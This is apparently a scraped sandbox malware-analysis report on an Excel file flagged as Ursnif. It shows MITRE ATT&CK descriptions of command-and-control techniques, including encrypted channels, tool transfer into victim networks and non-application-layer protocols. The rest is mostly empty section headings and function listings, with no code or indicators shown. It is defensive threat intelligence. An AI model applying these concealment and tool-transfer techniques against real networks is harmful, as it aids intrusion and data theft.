Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report document-1370071295.xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "document-1370071295.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

Function 001C12D4, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Function 1000102F, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 001C269C, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Function 001C83B7, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 10001EB5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 002A348F, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 367
memoryCOMMONCrypto

Function 001C7B5D, Relevance: 3.1, APIs: 2, Instructions: 82
comCOMMON

Function 10001D9F, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 001C8B94, Relevance: 33.2, APIs: 22, Instructions: 245
memorystringCOMMON

Function 001C6786, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Function 1000163F, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Function 001C1B2F, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 001C924F, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 001C225B, Relevance: 9.2, APIs: 6, Instructions: 159
memoryCOMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre